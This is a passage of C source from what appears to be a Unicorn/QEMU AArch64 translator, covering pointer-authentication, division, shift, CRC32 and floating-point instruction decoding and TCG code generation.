(!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x05): /* AUTIB */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autib(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x06): /* AUTDA */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autda(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x07): /* AUTDB */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autdb(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x08): /* PACIZA */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacia(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x09): /* PACIZB */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacib(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0a): /* PACDZA */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacda(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0b): /* PACDZB */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacdb(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0c): /* AUTIZA */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autia(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0d): /* AUTIZB */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autib(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0e): /* AUTDZA */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autda(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x0f): /* AUTDZB */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autdb(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, new_tmp_a64_zero(s)); } break; case MAP(1, 0x01, 0x10): /* XPACI */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_xpaci(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd); } break; case MAP(1, 0x01, 0x11): /* XPACD */ if (!dc_isar_feature(aa64_pauth, s) || rn != 31) { goto do_unallocated; } else if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_xpacd(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd); } break; default: do_unallocated: unallocated_encoding(s); break; } #undef MAP } static void handle_div(DisasContext *s, bool is_signed, unsigned int sf, unsigned int rm, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_n, tcg_m, tcg_rd; tcg_rd = cpu_reg(s, rd); if (!sf && is_signed) { tcg_n = new_tmp_a64(s); tcg_m = new_tmp_a64(s); tcg_gen_ext32s_i64(tcg_ctx, tcg_n, cpu_reg(s, rn)); tcg_gen_ext32s_i64(tcg_ctx, tcg_m, cpu_reg(s, rm)); } else { tcg_n = read_cpu_reg(s, rn, sf); tcg_m = read_cpu_reg(s, rm, sf); } if (is_signed) { gen_helper_sdiv64(tcg_ctx, tcg_rd, tcg_n, tcg_m); } else { gen_helper_udiv64(tcg_ctx, tcg_rd, tcg_n, tcg_m); } if (!sf) { /* zero extend final result */ tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } } /* LSLV, LSRV, ASRV, RORV */ static void handle_shift_reg(DisasContext *s, enum a64_shift_type shift_type, unsigned int sf, unsigned int rm, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_shift = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_rd = cpu_reg(s, rd); TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); tcg_gen_andi_i64(tcg_ctx, tcg_shift, cpu_reg(s, rm), sf ? 63 : 31); shift_reg(tcg_ctx, tcg_rd, tcg_rn, sf, shift_type, tcg_shift); tcg_temp_free_i64(tcg_ctx, tcg_shift); } /* CRC32[BHWX], CRC32C[BHWX] */ static void handle_crc32(DisasContext *s, unsigned int sf, unsigned int sz, bool crc32c, unsigned int rm, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_acc, tcg_val; TCGv_i32 tcg_bytes; if (!dc_isar_feature(aa64_crc32, s) || (sf == 1 && sz != 3) || (sf == 0 && sz == 3)) { unallocated_encoding(s); return; } if (sz == 3) { tcg_val = cpu_reg(s, rm); } else { uint64_t mask; switch (sz) { case 0: mask = 0xFF; break; case 1: mask = 0xFFFF; break; case 2: mask = 0xFFFFFFFF; break; default: g_assert_not_reached(); } tcg_val = new_tmp_a64(s); tcg_gen_andi_i64(tcg_ctx, tcg_val, cpu_reg(s, rm), mask); } tcg_acc = cpu_reg(s, rn); tcg_bytes = tcg_const_i32(tcg_ctx, 1 << sz); if (crc32c) { gen_helper_crc32c_64(tcg_ctx, cpu_reg(s, rd), tcg_acc, tcg_val, tcg_bytes); } else { gen_helper_crc32_64(tcg_ctx, cpu_reg(s, rd), tcg_acc, tcg_val, tcg_bytes); } tcg_temp_free_i32(tcg_ctx, tcg_bytes); } /* Data-processing (2 source) * 31 30 29 28 21 20 16 15 10 9 5 4 0 * +----+---+---+-----------------+------+--------+------+------+ * | sf | 0 | S | 1 1 0 1 0 1 1 0 | Rm | opcode | Rn | Rd | * +----+---+---+-----------------+------+--------+------+------+ */ static void disas_data_proc_2src(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, rm, opcode, rn, rd; sf = extract32(insn, 31, 1); rm = extract32(insn, 16, 5); opcode = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); if (extract32(insn, 29, 1)) { unallocated_encoding(s); return; } switch (opcode) { case 2: /* UDIV */ handle_div(s, false, sf, rm, rn, rd); break; case 3: /* SDIV */ handle_div(s, true, sf, rm, rn, rd); break; case 8: /* LSLV */ handle_shift_reg(s, A64_SHIFT_TYPE_LSL, sf, rm, rn, rd); break; case 9: /* LSRV */ handle_shift_reg(s, A64_SHIFT_TYPE_LSR, sf, rm, rn, rd); break; case 10: /* ASRV */ handle_shift_reg(s, A64_SHIFT_TYPE_ASR, sf, rm, rn, rd); break; case 11: /* RORV */ handle_shift_reg(s, A64_SHIFT_TYPE_ROR, sf, rm, rn, rd); break; case 12: /* PACGA */ if (sf == 0 || !dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } gen_helper_pacga(tcg_ctx, cpu_reg(s, rd), tcg_ctx->cpu_env, cpu_reg(s, rn), cpu_reg_sp(s, rm)); break; case 16: case 17: case 18: case 19: case 20: case 21: case 22: case 23: /* CRC32 */ { int sz = extract32(opcode, 0, 2); bool crc32c = extract32(opcode, 2, 1); handle_crc32(s, sf, sz, crc32c, rm, rn, rd); break; } default: do_unallocated: unallocated_encoding(s); break; } } /* * Data processing - register * 31 30 29 28 25 21 20 16 10 0 * +--+---+--+---+-------+-----+-------+-------+---------+ * | |op0| |op1| 1 0 1 | op2 | | op3 | | * +--+---+--+---+-------+-----+-------+-------+---------+ */ static void disas_data_proc_reg(DisasContext *s, uint32_t insn) { int op0 = extract32(insn, 30, 1); int op1 = extract32(insn, 28, 1); int op2 = extract32(insn, 21, 4); int op3 = extract32(insn, 10, 6); if (!op1) { if (op2 & 8) { if (op2 & 1) { /* Add/sub (extended register) */ disas_add_sub_ext_reg(s, insn); } else { /* Add/sub (shifted register) */ disas_add_sub_reg(s, insn); } } else { /* Logical (shifted register) */ disas_logic_reg(s, insn); } return; } switch (op2) { case 0x0: switch (op3) { case 0x00: /* Add/subtract (with carry) */ disas_adc_sbc(s, insn); break; case 0x01: /* Rotate right into flags */ case 0x21: disas_rotate_right_into_flags(s, insn); break; case 0x02: /* Evaluate into flags */ case 0x12: case 0x22: case 0x32: disas_evaluate_into_flags(s, insn); break; default: goto do_unallocated; } break; case 0x2: /* Conditional compare */ disas_cc(s, insn); /* both imm and reg forms */ break; case 0x4: /* Conditional select */ disas_cond_select(s, insn); break; case 0x6: /* Data-processing */ if (op0) { /* (1 source) */ disas_data_proc_1src(s, insn); } else { /* (2 source) */ disas_data_proc_2src(s, insn); } break; case 0x8: /* (3 source) */ case 0x9: /* (3 source) */ case 0xa: /* (3 source) */ case 0xb: /* (3 source) */ case 0xc: /* (3 source) */ case 0xd: /* (3 source) */ case 0xe: /* (3 source) */ case 0xf: /* (3 source) */ disas_data_proc_3src(s, insn); break; default: do_unallocated: unallocated_encoding(s); break; } } static void handle_fp_compare(DisasContext *s, int size, unsigned int rn, unsigned int rm, bool cmp_with_zero, bool signal_all_nans) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_flags = tcg_temp_new_i64(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, size == MO_16); if (size == MO_64) { TCGv_i64 tcg_vn, tcg_vm; tcg_vn = read_fp_dreg(s, rn); if (cmp_with_zero) { tcg_vm = tcg_const_i64(tcg_ctx, 0); } else { tcg_vm = read_fp_dreg(s, rm); } if (signal_all_nans) { gen_helper_vfp_cmped_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } else { gen_helper_vfp_cmpd_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } tcg_temp_free_i64(tcg_ctx, tcg_vn); tcg_temp_free_i64(tcg_ctx, tcg_vm); } else { TCGv_i32 tcg_vn = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_vm = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_vn, rn, 0, size); if (cmp_with_zero) { tcg_gen_movi_i32(tcg_ctx, tcg_vm, 0); } else { read_vec_element_i32(s, tcg_vm, rm, 0, size); } switch (size) { case MO_32: if (signal_all_nans) { gen_helper_vfp_cmpes_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } else { gen_helper_vfp_cmps_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } break; case MO_16: if (signal_all_nans) { gen_helper_vfp_cmpeh_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } else { gen_helper_vfp_cmph_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); } break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, tcg_vn); tcg_temp_free_i32(tcg_ctx, tcg_vm); } tcg_temp_free_ptr(tcg_ctx, fpst); gen_set_nzcv(tcg_ctx, tcg_flags); tcg_temp_free_i64(tcg_ctx, tcg_flags); } /* Floating point compare * 31 30 29 28 24 23 22 21 20 16 15 14 13 10 9 5 4 0 * +---+---+---+-----------+------+---+------+-----+---------+------+-------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | op | 1 0 0 0 | Rn | op2 | * +---+---+---+-----------+------+---+------+-----+---------+------+-------+ */ static void disas_fp_compare(DisasContext *s, uint32_t insn) { unsigned int mos, type, rm, op, rn, opc, op2r; int size; mos = extract32(insn, 29, 3); type = extract32(insn, 22, 2); rm = extract32(insn, 16, 5); op = extract32(insn, 14, 2); rn = extract32(insn, 5, 5); opc = extract32(insn, 3, 2); op2r = extract32(insn, 0, 3); if (mos || op || op2r) { unallocated_encoding(s); return; } switch (type) { case 0: size = MO_32; break; case 1: size = MO_64; break; case 3: size = MO_16; if (dc_isar_feature(aa64_fp16, s)) { break; } /* fallthru */ default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fp_compare(s, size, rn, rm, opc & 1, opc & 2); } /* Floating point conditional compare * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 3 0 * +---+---+---+-----------+------+---+------+------+-----+------+----+------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | cond | 0 1 | Rn | op | nzcv | * +---+---+---+-----------+------+---+------+------+-----+------+----+------+ */ static void disas_fp_ccomp(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int mos, type, rm, cond, rn, op, nzcv; TCGv_i64 tcg_flags; TCGLabel *label_continue = NULL; int size; mos = extract32(insn, 29, 3); type = extract32(insn, 22, 2); rm = extract32(insn, 16, 5); cond = extract32(insn, 12, 4); rn = extract32(insn, 5, 5); op = extract32(insn, 4, 1); nzcv = extract32(insn, 0, 4); if (mos) { unallocated_encoding(s); return; } switch (type) { case 0: size = MO_32; break; case 1: size = MO_64; break; case 3: size = MO_16; if (dc_isar_feature(aa64_fp16, s)) { break; } /* fallthru */ default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (cond < 0x0e) { /* not always */ TCGLabel *label_match = gen_new_label(tcg_ctx); label_continue = gen_new_label(tcg_ctx); arm_gen_test_cc(tcg_ctx, cond, label_match); /* nomatch: */ tcg_flags = tcg_const_i64(tcg_ctx, nzcv << 28); gen_set_nzcv(tcg_ctx, tcg_flags); tcg_temp_free_i64(tcg_ctx, tcg_flags); tcg_gen_br(tcg_ctx, label_continue); gen_set_label(tcg_ctx, label_match); } handle_fp_compare(s, size, rn, rm, false, op); if (cond < 0x0e) { gen_set_label(tcg_ctx, label_continue); } } /* Floating point conditional select * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 * +---+---+---+-----------+------+---+------+------+-----+------+------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | cond | 1 1 | Rn | Rd | * +---+---+---+-----------+------+---+------+------+-----+------+------+ */ static void disas_fp_csel(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int mos, type, rm, cond, rn, rd; TCGv_i64 t_true, t_false, t_zero; DisasCompare64 c; MemOp sz; mos = extract32(insn, 29, 3); type = extract32(insn, 22, 2); rm = extract32(insn, 16, 5); cond = extract32(insn, 12, 4); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); if (mos) { unallocated_encoding(s); return; } switch (type) { case 0: sz = MO_32; break; case 1: sz = MO_64; break; case 3: sz = MO_16; if (dc_isar_feature(aa64_fp16, s)) { break; } /* fallthru */ default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* Zero extend sreg & hreg inputs to 64 bits now. */ t_true = tcg_temp_new_i64(tcg_ctx); t_false = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, t_true, rn, 0, sz); read_vec_element(s, t_false, rm, 0, sz); a64_test_cc(tcg_ctx, &c, cond); t_zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, c.cond, t_true, c.value, t_zero, t_true, t_false); tcg_temp_free_i64(tcg_ctx, t_zero); tcg_temp_free_i64(tcg_ctx, t_false); a64_free_cc(tcg_ctx, &c); /* Note that sregs & hregs write back zeros to the high bits, and we've already done the zero-extension. */ write_fp_dreg(s, rd, t_true); tcg_temp_free_i64(tcg_ctx, t_true); } /* Floating-point data-processing (1 source) - half precision */ static void handle_fp_1src_half(DisasContext *s, int opcode, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst = NULL; TCGv_i32 tcg_op = read_fp_hreg(s, rn); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); switch (opcode) { case 0x0: /* FMOV */ tcg_gen_mov_i32(tcg_ctx, tcg_res, tcg_op); break; case 0x1: /* FABS */ tcg_gen_andi_i32(tcg_ctx, tcg_res, tcg_op, 0x7fff); break; case 0x2: /* FNEG */ tcg_gen_xori_i32(tcg_ctx, tcg_res, tcg_op, 0x8000); break; case 0x3: /* FSQRT */ fpst = get_fpstatus_ptr(tcg_ctx, true); gen_helper_sqrt_f16(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x8: /* FRINTN */ case 0x9: /* FRINTP */ case 0xa: /* FRINTM */ case 0xb: /* FRINTZ */ case 0xc: /* FRINTA */ { TCGv_i32 tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(opcode & 7)); fpst = get_fpstatus_ptr(tcg_ctx, true); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); gen_helper_advsimd_rinth(tcg_ctx, tcg_res, tcg_op, fpst); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); break; } case 0xe: /* FRINTX */ fpst = get_fpstatus_ptr(tcg_ctx, true); gen_helper_advsimd_rinth_exact(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0xf: /* FRINTI */ fpst = get_fpstatus_ptr(tcg_ctx, true); gen_helper_advsimd_rinth(tcg_ctx, tcg_res, tcg_op, fpst); break; default: abort(); } write_fp_sreg(s, rd, tcg_res); if (fpst) { tcg_temp_free_ptr(tcg_ctx, fpst); } tcg_temp_free_i32(tcg_ctx, tcg_op); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating-point data-processing (1 source) - single precision */ static void handle_fp_1src_single(DisasContext *s, int opcode, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; void (*gen_fpst)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_ptr) = NULL; TCGv_i32 tcg_op, tcg_res; TCGv_ptr fpst; int rmode = -1; tcg_op = read_fp_sreg(s, rn); tcg_res = tcg_temp_new_i32(tcg_ctx); switch (opcode) { case 0x0: /* FMOV */ tcg_gen_mov_i32(tcg_ctx, tcg_res, tcg_op); goto done; case 0x1: /* FABS */ gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_op); goto done; case 0x2: /* FNEG */ gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_op); goto done; case 0x3: /* FSQRT */ gen_helper_vfp_sqrts(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); goto done; case 0x8: /* FRINTN */ case 0x9: /* FRINTP */ case 0xa: /* FRINTM */ case 0xb: /* FRINTZ */ case 0xc: /* FRINTA */ rmode = arm_rmode_to_sf(opcode & 7); gen_fpst = gen_helper_rints; break; case 0xe: /* FRINTX */ gen_fpst = gen_helper_rints_exact; break; case 0xf: /* FRINTI */ gen_fpst = gen_helper_rints; break; case 0x10: /* FRINT32Z */ rmode = float_round_to_zero; gen_fpst = gen_helper_frint32_s; break; case 0x11: /* FRINT32X */ gen_fpst = gen_helper_frint32_s; break; case 0x12: /* FRINT64Z */ rmode = float_round_to_zero; gen_fpst = gen_helper_frint64_s; break; case 0x13: /* FRINT64X */ gen_fpst = gen_helper_frint64_s; break; default: g_assert_not_reached(); } fpst = get_fpstatus_ptr(tcg_ctx, false); if (rmode >= 0) { TCGv_i32 tcg_rmode = tcg_const_i32(tcg_ctx, rmode); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); gen_fpst(tcg_ctx, tcg_res, tcg_op, fpst); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } else { gen_fpst(tcg_ctx, tcg_res, tcg_op, fpst); } tcg_temp_free_ptr(tcg_ctx, fpst); done: write_fp_sreg(s, rd, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating-point data-processing (1 source) - double precision */ static void handle_fp_1src_double(DisasContext *s, int opcode, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; void (*gen_fpst)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_ptr) = NULL; TCGv_i64 tcg_op, tcg_res; TCGv_ptr fpst; int rmode = -1; switch (opcode) { case 0x0: /* FMOV */ gen_gvec_fn2(s, false, rd, rn, tcg_gen_gvec_mov, 0); return; } tcg_op = read_fp_dreg(s, rn); tcg_res = tcg_temp_new_i64(tcg_ctx); switch (opcode) { case 0x1: /* FABS */ gen_helper_vfp_absd(tcg_ctx, tcg_res, tcg_op); goto done; case 0x2: /* FNEG */ gen_helper_vfp_negd(tcg_ctx, tcg_res, tcg_op); goto done; case 0x3: /* FSQRT */ gen_helper_vfp_sqrtd(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); goto done; case 0x8: /* FRINTN */ case 0x9: /* FRINTP */ case 0xa: /* FRINTM */ case 0xb: /* FRINTZ */ case 0xc: /* FRINTA */ rmode = arm_rmode_to_sf(opcode & 7); gen_fpst = gen_helper_rintd; break; case 0xe: /* FRINTX */ gen_fpst = gen_helper_rintd_exact; break; case 0xf: /* FRINTI */ gen_fpst = gen_helper_rintd; break; case 0x10: /* FRINT32Z */ rmode = float_round_to_zero; gen_fpst = gen_helper_frint32_d; break; case 0x11: /* FRINT32X */ gen_fpst = gen_helper_frint32_d; break; case 0x12: /* FRINT64Z */ rmode = float_round_to_zero; gen_fpst = gen_helper_frint64_d; break; case 0x13: /* FRINT64X */ gen_fpst = gen_helper_frint64_d; break; default: g_assert_not_reached(); } fpst = get_fpstatus_ptr(tcg_ctx, false); if (rmode >= 0) { TCGv_i32 tcg_rmode = tcg_const_i32(tcg_ctx, rmode); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); gen_fpst(tcg_ctx, tcg_res, tcg_op, fpst); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } else { gen_fpst(tcg_ctx, tcg_res, tcg_op, fpst); } tcg_temp_free_ptr(tcg_ctx, fpst); done: write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op); tcg_temp_free_i64(tcg_ctx, tcg_res); } static void handle_fp_fcvt(DisasContext *s, int opcode, int rd, int rn, int dtype, int ntype) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (ntype) { case 0x0: { TCGv_i32 tcg_rn = read_fp_sreg(s, rn); if (dtype == 1) { /* Single to double */ TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_fcvtds(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rd); } else { /* Single to half */ TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); TCGv_i32 ahp = get_ahp_flag(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_rd, tcg_rn, fpst, ahp); /* write_fp_sreg is OK here because top half of tcg_rd is zero */ write_fp_sreg(s, rd, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rd); tcg_temp_free_i32(tcg_ctx, ahp); tcg_temp_free_ptr(tcg_ctx, fpst); } tcg_temp_free_i32(tcg_ctx, tcg_rn); break; } case 0x1: { TCGv_i64 tcg_rn = read_fp_dreg(s, rn); TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); if (dtype == 0) { /* Double to single */ gen_helper_vfp_fcvtsd(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); } else { TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); TCGv_i32 ahp = get_ahp_flag(tcg_ctx); /* Double to half */ gen_helper_vfp_fcvt_f64_to_f16(tcg_ctx, tcg_rd, tcg_rn, fpst, ahp); /* write_fp_sreg is OK here because top half of tcg_rd is zero */ tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, ahp); } write_fp_sreg(s, rd, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); break; } case 0x3: { TCGv_i32 tcg_rn = read_fp_sreg(s, rn); TCGv_ptr tcg_fpst = get_fpstatus_ptr(tcg_ctx, false); TCGv_i32 tcg_ahp = get_ahp_flag(tcg_ctx); tcg_gen_ext16u_i32(tcg_ctx, tcg_rn, tcg_rn); if (dtype == 0) { /* Half to single */ TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_rd, tcg_rn, tcg_fpst, tcg_ahp); write_fp_sreg(s, rd, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rd); } else { /* Half to double */ TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_fcvt_f16_to_f64(tcg_ctx, tcg_rd, tcg_rn, tcg_fpst, tcg_ahp); write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rd); } tcg_temp_free_i32(tcg_ctx, tcg_rn); tcg_temp_free_ptr(tcg_ctx, tcg_fpst); tcg_temp_free_i32(tcg_ctx, tcg_ahp); break; } default: abort(); } } /* Floating point data-processing (1 source) * 31 30 29 28 24 23 22 21 20 15 14 10 9 5 4 0 * +---+---+---+-----------+------+---+--------+-----------+------+------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | opcode | 1 0 0 0 0 | Rn | Rd | * +---+---+---+-----------+------+---+--------+-----------+------+------+ */ static void disas_fp_1src(DisasContext *s, uint32_t insn) { int mos = extract32(insn, 29, 3); int type = extract32(insn, 22, 2); int opcode = extract32(insn, 15, 6); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); if (mos) { unallocated_encoding(s); return; } switch (opcode) { case 0x4: case 0x5: case 0x7: { /* FCVT between half, single and double precision */ int dtype = extract32(opcode, 0, 2); if (type == 2 || dtype == type) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fp_fcvt(s, opcode, rd, rn, dtype, type); break; } case 0x10: /* FRINT{32,64}{X,Z} */ case 0x11: /* FRINT{32,64}{X,Z} */ case 0x12: /* FRINT{32,64}{X,Z} */ case 0x13: /* FRINT{32,64}{X,Z} */ if (type > 1 || !dc_isar_feature(aa64_frint, s)) { unallocated_encoding(s); return; } /* fall through */ case 0x0: case 0x1: case 0x2: case 0x3: case 0x8: case 0x9: case 0xa: case 0xb: case 0xc: case 0xe: case 0xf: /* 32-to-32 and 64-to-64 ops */ switch (type) { case 0: if (!fp_access_check(s)) { return; } handle_fp_1src_single(s, opcode, rd, rn); break; case 1: if (!fp_access_check(s)) { return; } handle_fp_1src_double(s, opcode, rd, rn); break; case 3: if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fp_1src_half(s, opcode, rd, rn); break; default: unallocated_encoding(s); } break; default: unallocated_encoding(s); break; } } /* Floating-point data-processing (2 source) - single precision */ static void handle_fp_2src_single(DisasContext *s, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_op1; TCGv_i32 tcg_op2; TCGv_i32 tcg_res; TCGv_ptr fpst; tcg_res = tcg_temp_new_i32(tcg_ctx); fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_op1 = read_fp_sreg(s, rn); tcg_op2 = read_fp_sreg(s, rm); switch (opcode) { case 0x0: /* FMUL */ gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1: /* FDIV */ gen_helper_vfp_divs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2: /* FADD */ gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3: /* FSUB */ gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x4: /* FMAX */ gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5: /* FMIN */ gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x6: /* FMAXNM */ gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7: /* FMINNM */ gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x8: /* FNMUL */ gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, 